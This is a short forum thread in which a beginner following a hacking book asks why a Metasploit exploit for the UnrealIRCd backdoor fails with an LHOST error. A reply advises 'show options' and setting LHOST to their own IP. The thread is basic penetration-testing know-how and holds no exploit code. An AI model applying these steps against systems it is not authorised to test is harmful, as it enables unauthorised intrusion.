Hello. I am really new to this and I was following the "The Hacker Ethos - First Edition Free" book and I got to the 'Metasploit' part -> "―msf
exploit(unreal_ircd_3281_backdoor)” . I used this to see the list of available exploits "exploit –h", but when I try to use any I get "Exploit failed: The following options failed to validate: LHOST." . What does this mean ? I tried to search it before posting but couldn't find anything to explain or help. Thank you.

try: show options
and then SET LHOST your ip

I don't get that part where it should say that the session was opened or something similar.
